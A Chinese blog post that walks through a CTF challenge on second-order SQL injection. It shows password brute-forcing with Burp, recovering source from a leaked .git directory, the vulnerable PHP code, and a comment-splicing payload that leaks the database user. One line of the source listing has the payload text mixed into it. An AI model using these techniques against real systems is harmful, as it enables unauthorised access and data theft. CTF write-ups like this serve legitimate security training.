sql二次注入实战--2018年网顶杯

于 2024-08-06 00:02:41 发布
阅读量607 收藏 17
点赞数 24
文章标签: sql android 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64302290/article/details/140933551
版权

网址:BUUCTF在线评测 (buuoj.cn)

当我们进入后显示这个页面:

当我们第一次点击发帖的时候就会跳转到登陆页面,上面有提示,告诉我们账号为zhangwei,密码为zhangwei***:

这里我们可以使用bp抓包工具来进行暴力破解密码:bp工具的基本使用大家可以上网查一下。

使用bp的intruder模块进行简单的密码暴力破解,最终破解出的密码为zhangwei666

之后使用该密码进行登陆:
对网站进行观察:该网站存在发帖和留言的功能。

我们需要对该网站的源码进行分析,这里还隐藏了一个.git的文件泄露,我们可以使用githacker工具获取源码。可以去github上面去选择一个来使用:

最后我们得到的源码为:
//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',     ',content= user(),/*
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

找注入点:

        对源代码进行分析,当我们发帖的的时候,执行的动作为write;

        当我们对帖子进行留言的时候就会执行comment动作。

在执行write动作的时候,我们发现这里使用了addslashes函数对我们的输入进行了过滤,该函数具有转义的作用,但是在数据入库的时候,mysql会将转义符过滤存入数据库中。

当执行comment动作(留言)的时候,它会从数据库中直接将category值取出来使用而没有进行过滤,所以注入点就在这里。

构建payload:       

insert into comment
       set category = ' dd',content=user(),/*',
           content = '*/#',
           bo_id = '$bo_id'";

第一步:在发帖功能中构建payload

      

第二步:

进入新建的帖子中,进行留言。

提交之后我们就可以发现注入出了当前用户:

到此我们就成功的找到了该网站的注入点,我们只需要利用该注入点进行下一步注入即可。为典型的二次注入。

        

@菜鸟小小
关注
  • 24
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
S-CMS企建v3二次SQL注入的方法
09-30
主要介绍了S-CMS企建v3二次SQL注入的方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
vulnhub靶场实战第一天:DC-1
2203_75839317的博客
04-28 469
但是这种密码一看就是经过文件进行加密后存储在数据库的,我们不知道这种加密方式也无法破解该密码,但是上面提示了爆破不一定是解决问题的办法,我们可以更改密码啊,drupal有文件可以生成此类加密的密文,就是 password-hash.sh。我们可以看到这里第1个漏洞是2018的,后面有2019的,但是这个2018的标签是excellent,表示非常好,而2019那个标签是normal,表示一般,所以我们肯定选择这个非常好,而且后面那个我也试过了,无法利用。那首先我们就来kali进行信息收集。
项目开发实战----动力恒合仓库
weixin_51660483的博客
07-24 680
*** 验证码工具kaptcha的配置类*//*** 配置验证码的类,用于设置验证码的各种属性。*//*** 创建并配置验证码生成器的bean。* @return 配置好的验证码生成器。*//*** 配置Producer接口的实现类DefaultKaptcha的bean对象,该对象用于生成验证码图片;* 并给其指定生成的验证码图片的设置项;bean对象的id引用名为captchaProducer;*/// 创建DefaultKaptcha实例。
CISP-PTE考试通关经验_cisp-ptesqlmap题型,2024最新2024金三银四
2401_84264741的博客
04-21 1069
这道题是一个挂号系统,之前靶场没遇到过,首先nmap或者御剑端口扫描,可以看到21,ftp,使用武器库里的xftp,左上角新建连接,打开页面有个匿名连接,输入靶机ip地址,连接,可以看到一个config文件,里面有数据库用户名密码。打开navicat,选择mysql连接,连接名称随意,输入ip,用户名,密码,连接即可,打开数据库看到user里面的Mayo,看到md5的密码,输入md5(自己任意设一个)火狐hackbar有md5加密,输入完后保存。大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。
sql盲注 解决_sql盲注-和sql盲注相关的内容-阿里云开发者社区
weixin_39592789的博客
12-19 213
《白帽子讲WEB安全》学习笔记之第7章 注入攻击第7章 注入攻击SQL注入的两个条件:1,用户可以控制输入;2,原本执行的SQL语句并接了用户输入的数据。7.1 sql注入SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码...文章科技小能手2017-11-12946浏览量DVWA系...
SpringBoot2零基础到项目实战-基础篇
我亦无他,唯手熟尔
02-23 728
SpringBoot技术是目前市面上从事JavaEE企业级开发过程中使用量最大的技术。本视频围绕SpringBoot技术由浅入深带领学习者从小白身份入门SpringBoot。经过若干个案例的制作与学习,全面掌握在企业级开发过程中如何使用SpringBoot技术将市面上各个层面各个领域的实用技术整合在一起工作,并应用于企业级开发各个层面的实际问题。
记一次Microsoft Access 数据库注入与waf的绕过
weixin_48421613的博客
10-14 4404
Microsoft Access Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。== 20189月25日,最新的
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
web-其他注入二次注入
07-15
在网络安全领域,Web应用常常面临着各种类型的注入攻击,其中“其他注入”和“二次注入”是两种常见的安全问题。这些攻击通常发生在Web应用程序未能正确过滤或验证用户输入时,允许恶意用户通过输入特定的SQL语句来...
postgresql 双重排序后 重复项 标识次序
cuisidong1997的博客
08-04 269
在这个查询中,ROW_NUMBER()会为每个product_id分组内的行分配一个唯一的sale_sequence。PARTITION BY product_id表示按product_id分组,ORDER BY sale_date表示在每个分组内按sale_date排序。最外层的ORDER BY product_id, sale_date确定了查询结果的最终排序。一个常见的方法是使用ROW_NUMBER()窗口函数,它会为每个分组内的行分配一个唯一的序号。
SQL Server中CPU使用率过高的排查
主宰
08-05 283
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
postgresql 分组合并 字段
cuisidong1997的博客
08-04 294
如果你想要合并的不是字符串字段,而是其他类型的字段,比如数字或日期,你也可以使用string_agg,但是需要将这些值转换为字符串。在PostgreSQL中,如果你想要将多个行的字段值合并为一个字段,你可以使用string_agg函数。这个函数可以将同一个组内的指定字段的值连接成一个字符串,并且可以自定义连接符。在这个例子中,array_agg将所有的薪资值收集到一个数组中,然后array_to_string将这个数组转换为一个由逗号分隔的字符串。postgresql 分组合并 字段。
SQL回顾
最新发布
Wincreds的博客
08-05 414
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
【靶场实操】sql-labs通关详解----第二节:前端页面相关(Less-11-Less-17)
goldfish8848的博客
08-03 580
SQL注入攻击是一种针对Web应用程序的安全漏洞,那么自然,SQL注入攻击也和前端页面息息相关,用户输入未被正确处理、动态查询的构建、前端JavaScript代码错误,等等我问题都可能造成安全威胁。在上一节,我们了解了基础的SQL注入模式,他们大多都从地址导航栏入手,直接向查询语句中注入攻击语句。本章我们来看和前端页面相关的一些SQL注入攻击。
sql第一次
nianwan2157的博客
08-05 246
最后截取192-200发现是已经截取完了。可以看到还没有截取完,再截取64-96。注意不要少写括号,不然会报错。1-32之后截取32-64。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值